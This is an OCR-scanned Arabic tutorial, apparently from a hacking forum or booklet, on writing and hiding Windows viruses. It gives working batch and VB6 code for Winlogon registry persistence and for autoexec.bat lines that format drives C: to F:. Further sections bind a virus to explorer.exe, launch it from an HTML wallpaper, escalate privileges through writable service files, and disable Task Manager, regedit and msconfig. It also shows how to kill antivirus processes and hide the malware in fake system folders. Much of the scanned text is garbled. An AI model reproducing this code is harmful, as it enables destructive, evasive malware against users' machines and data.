تشغیل (111ء) وهو مفتاح موجود فی الرجستری مسوؤل عن تشغیل هذا الملف (ع×ع.۲٥١٥ام×ء)‏ وما 

سوف نقوم بعمله بجعل ملف ۲٥۲[م×م‏ وملف الفیرس مع بعض ولم یکشف بأی طريقه ولایظهرحتی 
فی مں ٤٣ء‏ للويندوز واليكم مسار هذا المفتاح 

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\ 


عندما تتوجه إلى المسار السابق سوف تجد قيمًَا عديدة ابحث عن المفتاح S11‏ ستجد أن قيمتها 
الافتراضية ستکون ٥×۲.۶٥۲٠1[م×K‏ وبالطبع هو من أهم ملفات نظام التشغيل ثم حول هذه القيمه الى 
Explorer.exe c:\virus.exe‏ 


واليكم كود بلغه الباتش 
Reg add "hkLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\‏ 
Winlogon'"" /v SHELL /t reg_sz /d "Explorer.exe c:\VIRUS.EXE""‏ 


واليكم كود بلغه الفيجوال بيسك6 وهو الافضل 
Set WSH = CreateObject(''Wscript.Shell"")‏ 
WSH.RegWrite '"HKEY_ LOCAL MACHINE\SOFTWARE\Microsoft\Windows‏ 
NT\CurrentVersion\Winlogon\Shell'", "Explorer.exe C:\VIRUS.exe'"", '"REG_ SZ"‏ 


او 
Dim R As Object‏ 
Set R = CreateObject('' WScript.Shell"")‏ 
Const Key = "HKLM\Software\Microsoft'" _‏ 
'"'\Windows NT\CurrentVersion\Winlogon'""‏ + 
R.RegWrite Key, 1, '"REG_SZ""‏ 
R.RegWrite Key + '""\Shell"", "Explorer.exe '' & '"'"'C:\VIRUS.exe'""‏ 
Set R = Nothing‏ 
وهذا الكود لنسخ الفيرس لمكان ° 
FileCopy App.Path + '"" + App.EXEName + ".exe'", "C:\VIRUS.exe"‏ 
سوف يعمل الفيرس مع اقلاع الويندوز حتى سوف يعمل فى نظام الامان للويندوز مله ءfهء‏ 
3- ûhف AUTOEXEC.BAT‏ 
وهو ملف نظام مخفی ویکتب داخله اسم البرنامج ومساره بداخله لكى يعمل مع اقلاع الويندوز وهو 
موجود فى هذا السار c:\| AUTOEXEC.BAT‏ 


AITOEXEZ,BAT 
ا‎ 5-D5 Batch File 


DEB 


واليكم اكواد بلغه الباتش 


call attrib -h -r c:\lautoexec.bat >nul 

echo format c: /q /u /autotest >nul >>c:\autoexec.bat 
echo format d: /q /u /autotest >nul >>c:\lautoexec.bat 
echo format e: /q /u /autotest >nul >>c:\autoexec.bat 
echo format f: /q /u /autotest >nul >>c:\lautoexec.bat 


صيغه هذا الكود هو الاتصال بلملف ۸7۲0٤×٤ ٣.8۸‏ ووضع هذه الاکواد بداخله وسوف 
تعمل هذه الاكواد بعد اول اقلاع للويندوز 


4- فیروسات الدمج 

- الدمج مع ملف النظام ء×ع.إ١إهام×ء‏ ومساره ٥:۱۷]N.(0WS‏ وهو ملف المسئول عن عرض 
الصفحات والايقونات وأليكم كيفيه دمج الفیرس مع الملف ۵×ع.۲٥إ0اp×م‏ 

سوف نستخدم برنامج ۷1/۸۸۸ واليكم الصور الاتيه للشرح 


| explorer, exe | VIRUS,ERE 
Windows Explorer Win3dê Labinet Self-Extractor 
icrasaft Zarparatian 1 Microsoft Lorporation 


گے Archive name and parameters‏ چ 
General Advanced [Eies | Backup | Time | Lomment |‏ 


Biowze... 


آ1 


Archive hame 


...إستخراج الملفات 
إستنخراج شنا 
إستخراج إلى مجلد فرعي 

{@) 5can selected items For viruses 

E Add ko archive... 

E Add to "New Folder {2}. rar" 

E Compress and email... 

E Compress to "New Folder (2},rar" and email 


ته تغييه اسه الي 
چ explorer.exe]‏ | 


Update mode 


ûd and replace files >| 


Archive format Archiving opkions 


i@ BAR [|] Delete files after archiving 
3 2P Create SFX archive 0 


| | Create solid archive 
Lompression method [O Put authenticity verification 


Rormal ۳ | | Put recovery record 


Spit to volumes, bytes | Test archired files 


O Leck archive‏ اچ 


Cancel Help 


enn Tn 


2 


General Advanced | Modes | Text and icon | License | Module | General Advanced | Modes Tent andıiconı | License | Module | 
ا‎ 2 e 
Path toa emlract Temporary mode 


| Unpack to temporary folder 


3 eT i Dptional question 
J Create in "Prograrn Files 


Lreate in the current folder س‎ E 
Huestion title 


Silent rade 
Setup program O Display all 
Run after extraction O Hide start dialog 


explorer, ewe ® Hide all mn 


Rurı before eutraction 
WIRUS.EXE Dverwrite mode 


O ùsk before overwrite 


Sare current settings as default 1 O Skip enisting files 


Cancel 1 [ Help 1‏ [ کڪ Cancel Help‏ 
سوف يندمج الملفين مع بعض ويكون بهذا الشكل 
Explorer , exe‏ 


Windows Explorer 
Microsoft Zorporation 


ResHacker exe 
Shartcuk 


File Edit Yiew Action Help 
AV gpa Ta rath nove EON... - E are ta ral amr’ ا‎ 
leon 32 x 32 [16 colors] ا‎ - 
Dialog |16 x 16 [16 colors] ا‎ 
. i REE ڪس‎ 
String Table Loki | J er Funesl IMATH. 
+ REData E 
êy leon Group `. 
3 ك‎ 3000 
ER i EE 
wars) Save all resources... 
Save [ Icon Group ]rESOUrCES ,.,, 
Save [Icon Sroup : 3000 : 1033]... 
| . - _ . Fs 12e. َ L323" 
Line: 1 | Replace Resource, “س‎ 
— سس‎ isi rt hye [I er Fae, J. ° 2, ana " >] _ cere | 


Rename RESDUIrCE ER aroup ! 3000 : 1033] 


ثم بعد التغيير شكل الايقونه : نريد تبديل الملف المدمج بدلا من الملف الإصلى 
exe)‏ .orerاexpاwindowsا:c)‏ لکی يعمل الفیرس مع الویندوز 
ولكى نجعل الملف المدمج يبدل اتوماتيكيا سوف iنwتخدم‏ ڊرgnli E-Batch Maker‏ 


a E-EatchMaker rexe 


ll Elsa5y]-Batch Maker 
By muswc Hack4cent 


وهوبرنامج يدمج الملفات ويرسلها الى المكان الذى تريده واليكم الطريقه 


Dptions Help 


uilding the batch file : 


û the project, This may produc 


ıe building slower ! 


Extract to + | Save to 


X Deletes ¥ aid 


host Application 


Include file : 


Fils Edit Tanls Project Zommands 


7 ۳ 


Bu 


Include Files ! 


wour File : 


بعد ما اتممنا العمل ينتج لنا ملف عند الضغط عليه سوف يبدل ملف الاصلى بلملف المدمج 
وهناك ايضا ملف مهم فى الويiدjg C:\WINDOWS\SYSTEM\ winlogon.exe yg‏ 
ملحوظه : هذه الطريقه لن تعمل اذا كان الويندوز المثبت أصلى لأنه يوجد بداخل الويندوز 
دفاع ذاتى وهذا غير متوفر فى الويندوزات المضاف اليه برامج او الملعوب فيه من قبل احد 
ليسهل عليك تثبيت الويندو بسرعه 

نفس الطريقه الماضيه 
نقوم بدمج ملف البرنامج مع الفيرس ثم نضعه فى برنامچ )8-81۷ ونرسله الى 
مسار lلبرliمچ‏ ںا C:\Program Files\Winamp‏ 


5 اسلوب العمل على الإمتدادات 
تغيير عمل امتداد معين على ملف الفيرس متلا تغيير عمل الامتداد ( ),p3‏ بدلا من برنامج 
مmpصھ«iس‏ الى ملف الفيرس 


6- الطرق المبتكره 
الطريقه الاولى : 
الطريقة تعتمد على خلفية سطح المكتب + التعديل في مسجل النظام لتغيرها هنالك اكواد تقوم 
بذلك مباشرة. 
شاهد هذه الصورة وذلك بعد إقتناص و التأشير على خلفية سطح المكتب. 
TF Spy Window EEE‏ 
چا + &* mR‏ اك 4 ت 


| General | Styles | lass | Process | Misc | 


Handle: lnon1ınopn 


Lapkion: 
lass: [Internet Explarer_Seryer 


Parent window: OODIOISAL 


First Child: loon1nopz اسا‎ 
ext Wiridany: None) 


Previous Window: DOO1003E - 


DwnEr YYinday: None) 


Exit 


Quick Options 
I# Auto Hide Spy Window Eoeus sing: 
کک‎ Feasnenanae 
Internet Explorer_Server...«aضژ‎ ةرابعlا ماذا تلاحظ؟؟؟ هل تعني لك هته‎ 
ماذا تستنتج؟ اعرف اني وضعتك في دائرة من التساؤلات وانك لم تفهم شيئ لاعليك سأوضح.‎ 
یستعمل في کثیر من الحالات وتراہ کثیرا في‎ C1ass هو‎ [1nternet Explorer_Server 
جميع الإصدارات لأنه هو الذي يقوم بعرض صفحات الإنترنت.‎ tenet Explorer 
وهذا يعني انك تستطيع ان تجعل خلفية ستطح المكتب عبارة عن ملف ]۲۷ ] لأنه هو‎ 
المستعمل في عرض الصور في الخلفية (وهذا ما توضحه الصورة الأولى)» وهنا المشكلة.‎ 
السيناريو سيكون كاتالي:‎ 
لکي لا یتم کشفها‎ System ۴es Dire c)0إy نسخ مe×م.یںuآVi إلى مکان معین غیر‎ 1 
طبقا لتقنية رلں)S إمزروطءط طبعا هذه إجراءات إحترازية ضد الكاسبر 2009 ممكن‎ 
سیکون من السهل نسخ الفيروس إلى مجلد النظام وعدم التعرض للكشف من برامج المكافحة‎ 
الاخرى.‎ 
۷i٣ u4.ع×e بھا کود یقوم بتشغیل‎ HH] 1] نشاء صفحة‎ 2 
التي تم إنشاءها.‎ ۲1M تغير الخلفية إلى صفحة ال‎ 3 
Rءعزء)إر.يف وذلك عن طريق التعديل على المفتاح التالي‎ 
HKEY_CURRENT_USER\Control Panel\Desktop 
HTML في القيمة مھم ا۷1 وجعلھا تشير إلى مسار ملف.‎ 
زائد التعديل على‎ 
HKEY_CURRENT_USER\Control Panel\Desktop\WallpaperStyle 


على القيمة مم وم ااج وجعلها 1 
طبعا التعديل على تلك المفاتيح لا يشكل خطر من وجهة نظر برامج المكافحة لذلك لا تكشف 
بالإضافة إلأى ان جميع برامج التحليل لا تكشفها من بينها. 
Autorun.s a-squared HijackFree sHijackTis‏ 
المهم بعد التعديل على تلك المفاتيح بعد إعادة تشغیل النظام او بعد علق ٥×ع.٣eإoاExp‏ 
سيتم تحميل الإعدادات وبالتالي تشغيل م×م.ءں ۷1 وهنالك مشكلة بسيطة يمكن حلها وهو 
انك کلما تعمل آ8۲ او ۴5 سيتم اعادة تشغيل التروجان من جهة هي مشكلة لأنه سيتم 
تشغیل نسخ عدیيدة من م×ع.ئںu ۷1٣‏ وذلك یتم حلھا عن طریق Crea Mi†u×‏ او 
CreateEvent‏ او ۴n Window‏ ومن جهة أخرى هي جيدة اذا كان صاحب الجهاز 
يغلق. عم×م.us‏ آ۷1 الآن نأتي لكتابة بعض الأكواد. 
كود التشغيل الموجود في._]۲M]‏ 
<script language=vbscript>‏ 
on error resume next‏ 
dim sys‏ 
Set df = document.createElement(''object'")‏ 
df.setA ttribute ''classid'", ''clsid:BD96C556-65A3-11D0-983۸A-‏ 
00CO04FC29E36 '""‏ 
set fso = df.createobject(''Scripting.FileSystemObject'",'""")‏ 
set s=df.CreateObject(''Shell.Application.1'",'""")‏ 
set re=df.createobject(''wscript.shell'",'"'")‏ 
sys=fso.GetSpecialFolder(1)‏ 
s.Open ("'"C:\ VIRUS.exe'"")‏ 
</script>‏ 
ضع الكود فى ملف نصى ثم غير الامتداد الى ( اص)ط.) ويمكنك وضع صوره عن طريق 
تدوس بزر الايمن للماوس على الملف واختيار ٤1ء‏ ثم ضع الصوره 
الكود هذا لا يعمل مع ( ۲8٤١إ0ام×٤‏ ٤ع”«إمtم[]‏ ) يعني اذا تم تثبيته فان الصفحة لن تقوم 
بتشغيل البرنامج لذلك اترك لك عناء البحث عن طريقة للتشغيل. 
وفي النهاية من الممكن ان يتسائل الإخوة تغير الخلفية سيكشف الأمر وسيشك صاحب الجهاز 
اقول يمكن لك ان تقوم بالتعديل على الصفحة واظافة صورة الخلفية السابقة في ملف 
1M +‏ Hکود‏ التشغیل. 
طبعا باب الإبداع مقتوح وطبعا هنالك طرق عديدة للتشغيل التلقائي يمكن ان تكتشفها بنفسك 
وما اضیفه إلى هو ان ھذہ الطریق بما انھا تشتغل من ٥×ع.۲٤١٥ام×E‏ یمکن ان تقوم بوضع 
Expt‏ كخلفية ویتم تنفیذ )زام ×5 من خلال ۲×٥.۲٥0۲[م‏ ×8 وعن طریق هذا ستتفادی 
الكثير من برامج المكافحة. 


الطريقه الثانيه : 

ثغره ( تخطي الصلاحيات ) في W132‏ 

المقدمة : 

في البداية طبعا لابد ان نفهم ما خطورة هذه الثغرات وما عملها ؟ 

هذه الثغرة من الثغرات العالية الخطورة حيث تمكن المخترق بان يستخدم صلاحيات الجذر 

لتنفيذ اي برنامج خبيث داخل السيرفر 

** في هذا الموضوع سوف اشرح طريقة من طرق اكتشاف هذه الثغرة ** 

کیف يتم استغلالها : 

يتم استغلال هذا النوع من الثغرات اما ان تكون هناك ثغرة في النظام نفسه او ان يكون 

هناك برنامج مصاب يعمل كخدمة ( معزرإمء ) تعمل عند بداية الجهاز او السيرفر 

الأدوات : 

* برنامجچ pٍ×0ceاrمp‏ 

الشرح على برنامج مصاب : 

حسنا لنقوم بتثبيت البرنامج المصاب على الجهاز الخاص بنا ونقوم بفتح برنامج 

procexp‏ ا الان لننظر الى الملف الذي يعمل للبرنامج في الخدمات الاساسية للنظام 
مثلا يكون اسم الخدم EPSON_EB_RPCV4_01‏ 

حسنا سوف نقوم بتنفيذ الأمر : 

[sc qc [service name 

هذا الأمر يقوم بالكشف عن مسار الملف الذي يعمل كخدمة اساسية للنظام سيكون امرنا 


النهائي ھکذا 


sc qc EPSON_EB_RPCV4_01 


سيظهر لنا الأتي 


[SC] QueryServiceConfig SUCCESS 


SERVICE_NAME: EPSON_EB_RPCV4_01 

TYPE : 10 WIN32_OWN_PROCESS 
START_TYPE :2 AUTO_START 
ERROR_CONTROL :1 NORMAL 

BINARY _PATH_NAME : C:\Documents and Settings\All 


Users\Application Data\lEPSON\EPW!3 SSRP\E_S40ST7.EXE 


LOAD_ORDER_GROUP : 

TAG :0 

DISPLAY _ NAME : EPSON VS Service4(01) 
DEPENDENCIES : RpcSs 
SERVICE_START_NAME : LocalSystem 


حسنا مسار الملف الذي يعمل كخدمة ها هو : 


C:\Documents and Settings\All Users\A pplication 
Data\lEPSONM\EPW!3 SSRP\E_S40ST7.EXE 


الان لنقوم بالكشف عن صلاحيات هذا الملف عن طريق الأمر 


"cacls "file path 
سيكون الامر النهائي هكذا‎ 
cacls '"'"C:\Documents and Settings\All Users\A pplication 
Data\EPSON\EPW!3 SSRP\E_S40ST7.EXE" 
انظر الان الى الخطا الفادح انظر الى صلاحيات الملف‎ 
C:\Documents and Settings\All Users\A pplication 
Data\EPSON\EPW!3 SSRP\E_S40ST7.EXE 
Everyone:F 
کما شاهدت ان صلاحیانه‎ 
Everyone:F 
حیث ان ۴ تعني 1٥إ٤ره٥ 1اں۴ اذن هنا الخطا الفادخ والثغرة‎ 
حسنا الان ماذا لو قمنا بتبديل الملف هذا‎ 
C:\Documents and Settings\All Users\A pplication 
Data\EPSON\EPW!3 SSRP\E_S40ST7.EXE 
) بملف خبيث ؟؟ ( بنفس الاسم طبعا‎ 


هذا مثال لبرنامج غير مصاب Eset Smart Security g4y‏ 
لنرى ملف البرنامج الذي يعمل كخدمة في النظام : e×ع."٣‏ )م 


لنكشف عن صلاحياته 
cacls "C:\Program Files\ESET\ESET Smart Security\lekrn.exe "‏ 
C:\Program Files\ESET\IESET Smart Security\ekrn.exe‏ 
BUILTIN\Users:R‏ 


BUILTIN\Administrators:F 
NT AUTHORITY\SYSTEM:F 


اكيد فهمت الان الفكرة الان في هذا برنامج ءءء الغير مصاب وجدنا ان صلاحيات ال 
امي العادي فقط القرائة وليس هو Administrator :F J|‏ 
ان شاء الله اكون وفقت في الشرح . 


7 استخدام صلاحيات الویندوز و جداول الاعمال : 


قد تستغربون ما دخل الصلاحيات فى الويندوز بجداول الاعمال واليكم فكره كل منهم : 

ه اولا الصلاحيات : كلنا نعلم ان احقيه وصول الى الصلاحيات فى الويندوز تنقسم الى 

SER‏ وهو المستخدم (الاقل صلاحيه) 

ministrator‏ ۾ وهو للمستخدم المحترف 

- EMآSYS‏ وهو لھ الاحقیھ فی التعدیل ( ١ہ٣٤ہہء‏ ااںu)‏ فی كل مفاتيح الرجسترى المخفيه 

التى لاتظهر ألا عند استخدامك فی وضع S۲5۲1۳٤۷‏ وهی عن طریق الامر فى CM‏ وهی 
At 10:00pm /interactive REGEDIT'.exe‏ 

ه انيا جداول الاعمال : وهو يقوم المستخدم بتشغيل بعض البرامج فى مواعيد محدده 

وبشکل منتظم بدون اذن 

تخيل لو ادمجنا هاتين الخاصتين فى الفيروسات ينتج لنا فيرس خطير جدا يقوم بلعمل فى 

مواعید محدده بدون اذن وبشکل لایکشف مع امکانیه صلاحیه .عرو 

واليك الكود التالى يقوم بتشغيل الفيرس فى الساعه العاشره مساء وله احقيه الوصول 

هاورو وبلتالى له الحق فى التعديل كما يشاء والكود التالى بلغه الباتش 8۸1. 

E 10:DOpm ‘imteractive C"1" VIRUS.EXE 


7 OT 


1 ل د التشقيل 
SYSTEM‏ 


والكود التالى يقوم بتشغيل الفيرس فى ايام الاسبوع فى المعاد المحدد 
A T 10:00pm 1Mnteractive EV ERY :m,t,w ,thf,s,su ciwirus.exe‏ 


ايام الاسبوع 


سوف تسأل كيف يقوم الويندوز بعمل جدول الاعمال وهو بكل بساطه يقوم بعمل ملف 
بامتداد طہز. فی هذا المسار ksیو‏ ۲ C:]|W IN (0 WS\‏ ویکون بداخل الملف اسم 
ومسار الملف وميعاد تشغيله 


او 


*اسلوب |خlء :task man ger‏ 
وهويقوم باخفاءه لعدم كشف البرامج التى تعمل على الذاكره لكى لاتكشف بكل سهوله 


Restore the Language bar 
Toolbars ۴ 


Lascade Windows 
Tile Windows Horizontally 
شتی‎ Tile Windows Yertkically 


a Show the Desktop 


yı Lock the Taskbar 
Properties 


.طز القبروسات ك FOIE 2j‏ 1 


واليكم القيم التى اعطاها للرجسترى لاخفاء task manger‏ 


HKEY_ MACHINE\SOFTW ARE\Microsoft\Windows\Curr entVersion\Policies 
\system\DisableTaskMgr /t REG_DWORD /d1 


HKEY _USER\Software\Microsoft\Windows\Curre ntVersion\Policies 
\system\DisableTaskMgr /t REG_DWORD /d 1 

والیکم اکواد بلغه الباتش لتعطیل موہ kیھ)‏ 
reg add hkcu\Software\Microsoft\Windows\Current Version‏ 


\policies\system\ /v DisableTaskMgr /t reg dword /d 1 
*اسلوب تعطیل الرجسترى‎ 


عند دخولك للرجستری عن طریق («ں۲) یعطی رساله خطا لعدم الدخول على مسارات بدايه 
التشغيل فى الويندوز وبلتالى سيتم ايقاف الفيرس عن العمل مع كل اقلاع للويندوز واصلاح ما فاسده 
الفيرس 


Kepistry Editor 


< Registry editing has been disabled by your administrator, 


OK. 


واليكم القيم التى اعطاها للرجسترى ليعطله 


HKEY_ USER\Software\Microsoft\Windows\Curre ntVersion 
\Policies\System\DisableRegistry Tools /t REG_DWORD /d 1 


تلاحظون أنه جعل جميع تلك القيم تأخذ المقدار 1 


وأليكم اكواد بلغه الباتش لتعطيل الرجسترى 
reg add hkcu\Software\Microsoft\Windows\Current Version‏ 
\Policies\System\ /v Disableregistrytools /t reg dword /d 1‏ 
كود بلغه الفيجوال بيسك 
Open "C:\WINDOWS\regedit.exe'' For Input Lock Read As 1‏ 
اسلوب تعطیل _ RUN‏ 
وهو تعطیل ں۲ نفسه لعدم تشغیل الرجستری او عنام ٥uٍp‏ ٣ع‏ 
واليكم كود بلغه الباتش 
Reg add hklIm\SOFTWARE\Microsoft\Windows\Current Version‏ 
\policies\Explorer\ /v NoRun /t reg _ dword /d 1‏ 


*تعطيل اظهار الملفات المخفيه (ورمن)مه (f01der‏ 
لأن معظم الفيروسات مخفيه فعندما تقوم بأظهارالملفات المخفيه لايحدث شىء ويرجع كما كان 
واليكم القيم التی اعطاها للرجسترى ليعطل خاصيه اظهار الملفات المخفيه 
HKEY _USER\Software\Microsoft\Windows\Curre nt Version‏ 
\Explorer\Advanced\Hidden /t EG_DWORD /d 0‏ 


HKEY _USER\Software\Microsoft\Windows\Curre nt Version 
\Explorer\Advanced\SuperHidden /t REG_DWORD /d 0 


HKEY _USER\Software\Microsoft\Windows\CurrentVersion 
\Explorer\Advanced\ShowSuperHidden /t REG_DWORD /d 0 


HKEY _MACHINE\Software\Microsoft\Windows\CurrentVersion 
\Explorer\Advanced\Hidden /t REG_DWORD /d 0 


HKEY _MACHINE\Software\Microsoft\Windows\CurrentVersion 
\Explorer\Advanced\SuperHidden /t REG_DWORD /d 0 


HKEY _MACHINE\Software\Microsoft\Windows\CurrentVersion 
\Explorer\Advanced\ShowSuperHidden /t REG_DWORD /d 0 


تلاحظون أنه جعل جميع تلك القيم تأخذ المقدار صفروهذه القيم لتعطيل رؤية ملفات النظام 
والملفات المخفية 
الجدير بالذكر هنا أن بعض الفيروسات يغير هذه القيم كل بضع ثواني أي يرجعها إلى الصفر 
ثم قام الفيرس بمسح القيمتين 
HKEY _MACHINE\SOFTW ARE\Microsoft\Windows\Curr entVersion‏ 


\Explorer\Advanced\Folder\Hidden\SHOWALL \Checked Value 


HKEY _MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion 
\Explorer\Advanced\Folder\Hidden\SHOWALL \DefaultValue 


كما قام بمنع ظهور خيارات nllجiدoptions Folder‏ 


HKEY _USER\Software\Microsoft\Windows\Curre ntVersion 
\Policies\Explorer\NoFolderOptions /t REG_DWORD /d 1 


HKEY _MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion 
\Policies\Explorer\NoFolderOptions /t REG_DWORD /d 1 
وهذا كود لاخفاء الفيرس بلغه الفيجوال بيسك‎ 


* مسح بر نامج (واگرcoیہ)‏ 
وهو برنامج موجود فی النظام وهو یظھر البرامج رں ٤۲ھاء‏ و ces‏ مء وبلتالی 
سيتم ايقاف الفيرس عن العمل مع كل اقلاع للويندوز 
واليكم كود مسح البرنامج بلغه الباتش 
del C:\windows\system32\msconfig.exe/q‏ 


setattr '"'c:\virus.exe''",vbHidden 


مسح بلغه فيجوال بيسك 
SetAttr '" C:\windows\system32\msconfig.exe '", vbNormal‏ 
Kill '' C:\windows\system32\msconfig.exe '""‏ 
ولتعطيله بلغه الفيجوال بيسك 
Open '"":\windows\system32\msconfig.exe '' For Input Lock Read As 1‏ 
ملحوظه : یتم تشغیل واگرہءء۔ والرجستری عن طریق اوامر ںہ ثم اکتب ھذاالامر 
msconfig‏ 


ڪڪ 8 E‏ ا 
al System Configuration Ukility TET‏ 


|General | 5ysTEm.ınt | wın.ıwr | BOOT, INI | Services Startup 


1 usbanlivirus1 Program FilesilMae.., HELMMSOFTWAREMicrosof Windows ZurrentYer,, , i 
[YÎ usbantivirus1 .exe CAPROGRA~TINAEYI.,, Startup 

E1 ci1 bat SOFTWARE 1MicrasofEY Windows ZurrentYersiont Ruri 
O2 cila, bat SOFTWARE\MicraosofEY Windows ZurrentYer sion Ruri 
A3 c13,bakt SOFTWARE 1MicrasofEY Windows ZurrentYersiont Ruri 
| | ctfman CWINODOWSISYSteEM..,. SOFTWARE MicrosofEY Windows ZurrentYersiont Ruri 
I | dumprep O -k hsystemroottlsyste,,, SOFTWARE MicrosofEY Windows ZurrentYersiont Ruri 
Î usbantivirus1 "Lif Program Files{ae.,,. SOFTWAREMicrosofWindawsZurrentYersiont Ruri 
ı1ı ci1 ,bakt SOFTWARE 1MicrasofEWindowsZurrentYersiont Ruri 
| | realsched "Cr Program FileslZorm,.,. SDFTWARE1MicrosofEY Windows ZurrentYersiont Ruri 
| winampAgent CAPROGRA~1Winam.,.,. Startup 

1 Enable All ۱|] bbe اھ‎ 


GROUP POLICE zaliري‎ e 
وهو برنامج يستخدم للمستخدم المحترف وهو يقوم بتعديل واصلاح صلاحيات للويندوز‎ 
وهو موجود فى هذا المسار‎ 
C:\WINDOWS\system32\mmc.exe 


كود بلغه الباتش 
Del C:\WINDO WS\system32\mmc.exe/q‏ 
بلغه الفيجوال بيسك 


SetAttr '' C:\windows\system32 mmc.exe '", vbNormal 
Kill '' C:\windows\system32\ mmc.exe '"' 


* اسلوب اغلاق برنامج الحمايه 


تقوم بعض الفيروسات بأغلاق برامج الحمايه لكى لاتكشف ولكن هذه الطريقه غير 
ناجحه اذا كان برنامج الحمايه مفعل به الحمايه الذاتيه للبرنامج 
واليكم طريقه اغلاق برامج الحمايه بلغه الباتش 


nod3AZkrn.exe 1 4 echo aff 
nocd3TZ exe مجح ححح ححح ححح جحد ھا‎ 
nocdl3Akui.exe 3 ram Kal At 2 کح و7‎ 
kKkav.exe 4 HET =SLTCOp TSPFPCUFILCY LE 

5E Hmets=sh FIrFEWAaALlLl set 0] 
7? tskill Fh fFire* 
zolimp ao a tskill A anti* 
vafinalizaû fT fim avgemc.exe a ك1‎ 
oli NMpawa 10 tskEill FA sp¥y* 
rofinalizaûo 7T FIM avqCC.exe 11 tak#il1ll1l F#ã bull1lgquard 
oll N Ipa™wû 1Z EskEill #A PersFw 
Liafinalizaû #T Fim avgamsvr.ıexg 13 tskill #A4A FAY 

14 tskill FA ZOMEAL ARH 

GoliNIpath 


15 tak#Eill ##A 3SAFEUWEE 


vafinalizaû fT FIN AVQUIPSVC.EXE 1 a14 


olimpao 17 takill #A OUTPOST 
ofinaliza™hb fT FIM avgw. ewe 18 taFill #ğ nr* 
oli paa 12 tskill FA naw* 
Haofinaliza™ûa f Fim ashi rSvy. Gx 20 tskIlLlL A F—#* 
alii pao Z1 E کک‎ 
ZE L3 1 [r 
ET, 
Z23 CLs 
z24 Lakill ۍ##‎ BLACEICZE 
ZE Ta EFT 1 1 Fh ApFr 


deltree /y c:\progra~1\name anti virus~1\*.* 


back uU]Þp_ بgل*‎ 


وهو کلما مسحت الفیرس یرجع تانی وهو له ملف مساعد بأمتداد kھط.*‏ 


اسلوب recycle bin‏ 
وهو یقوم الفیرس بلاختباء داخل «1ط ce‏ ر٤٥٣‏ لکی لايكشف وهو يستغل نقطه ضعف فى الویندوز 
فأنه لايعرض الملفات التي بداخله وبمجرد دخولك عليه بحولك الي لينك الخاص بلمهملات 


= 2 Recy fcled - WINRAR. i * 1 WO fecy cle Bin کے‎ 


File Edit View Favorites Tools Help 


EFTETT س | رو‎ 
Extract To Test Yi Delete Find 1 ا‎ 


Address | 6 Recycle Bin 


¥ 


| EE | | û] CHRecyrcled 


Hame 3i Type Modified 
5] .. Folder 
| desktop, ini ê5 File INI B/242010 1 
|_| INFOE 4,420 File 342004 5: 


صنط وي المعملات بارع 


بو ناهج الضغط بظعر الحقيقة انه ليس بارع 


ll ۴ 


Total 46, 485 bytes in 2 Files 
يظهر الحقيقه انه لیس فارغ‎ win r٣ وعند تستخدم برنامج‎ 
وهناك اسلوب اخر وهو ان يصنع مبرمج الفيرس صندوق مهملات بنفسه وهذه الطريقه تستخدم مع‎ 
فيروسات الفلاشات‎ 

| اق 


- ann. اا‎ 
| TRASH E E 
> ormatin 
E 


وبلطبع صندوق المهملات به الفيرس ولكنه لن يظهر وسوف تجد الصندوق فارغ وسوف يقوم ملف 
autorun‏ بتشغیل الفیرس والیکم کود ہںuآ٥) au‏ 
[autorun]‏ 
open=TRASHl\bin.exe‏ 
واليكم كيذ کیفیه صناعه صندوق مهملات جیب ملف نصی عادی ثم حول اسمه وامتداده بدلا من .txt‏ 
اليئ dektopini‏ سوف يتحول الى ملف نظام وهو ملف المسئول عن شكل الايقونات وبعد ما عملت 
الملف اضع هذا الكود بداخله 
[.ShellClassInfo]‏ 
CLSID={645FF040-5081-101B-9F08-00A۸۸002F954E}‏ 
الطريقه الثانيه وهى اعمل فولدر جديد ثم اعمل له اعاده تسميه وضع هذا الكود مكان الاسم 
31.{645FF040-5081-101B-9F08-OOAAOO2F954E}‏ 


( قق ص 
a | 31. {645FFD40-5081-1018-9F...‏ لا New Folder‏ 
ww‏ 


ا 


control pane] اذوب‎ * 


وهو یقوم مبرمج الفیرس بعمل فولدر لوحه تحکم وهمیه ویکون بداخله الفیرس وهو ایضا لدیه نفس 
عيب صندوق المهملات حيث عند دخولك للفولدر يحولك تلقأيا الى لينك 
(ہ11) لوحه التحكم فی الویندوز 
واليكم الطريقه كيفيه عمل لوحه تحكم وهميه وهى نفس فكره صندوق المهملات ولكن نضع كود اخر 
داخل ملف نہذ.مه)kیمd‏ وھو 
[.ShellClassInfo ]‏ 
CLSID={21EC2020-3AEA-1069-A2DD-08002B30309D}‏ 
الطريقه الثانيه وهى اعمل فولدر جديد ثم اعمل له اعاده تسميه وضع هذا الكود مكان الاسم 
Control Panel.{21EC2020-3AEA-1069-A2DD-08002B830309D}‏ 


* اسلوب فولدرات النظام الرئيسيه 
وهو يقوم بلأختباء داخل فولدرات النظام وهى بعيده عن عين المستخدم مثل 
C:\windows‏ 
C:\windows\system32‏ 


* اختباء فولدر الملفات المؤقته temp‏ 
وهی کثیره فی الویندوز ولکی تجدها من الافضل ان تعمل بحث عن اسم الفولدر مدرع) 
C:\Documents and Settings\ pدختصall pwl\ Local Settings\Temp‏ 


* اختباء فی فولدرات استعاده النظام (مtیم)‏ 
وهو من اخطر الفیروسات حیث البعض منھا له خاصیھ مرں ckھط‏ 
وهذا الفولدر يكون بهذا الاسم ومسار 
C:\ System Volume Information‏ 
ولکل برتشن له فولدر استعاده 


* فوlدر Prefetch‏ 
وهو فولدر يقوم بتسجيل كل حركه فى الويندوز ويختبىء بداخله الفيروسات وهو بهذا المسار 
C:\WINDO WS\Prefetch‏ 


الاخفاء المتقدم للفيروسات 


في هذا الموضوع سنناقش مفهوم )امهم لأنه بدأ ينتشر في عدة مجالات أهمها الأمن والحماية 
وكما تلاحظ فإن اخطر الفايروسات تستخدم هذة الطريقة للتخفي 

وظهرت عدة شركات تستخدمها في الحماية ؟ مثل حماية الاقراص والملفات وبداً إنتشار RootKit‏ 
ليشمل برامج مكافحة الفايروسات 

كما قلنا سابقا مفهوم هه يعني التخفي و الصلاحيات وهو الشكل المرئي من موضوع الامتيازات 


في النظام 
نعرف بأن أنظمة التشغيل تعمل في عدة مستويات او امتيازات لتعطي البرامج الاحقية في الوصول 
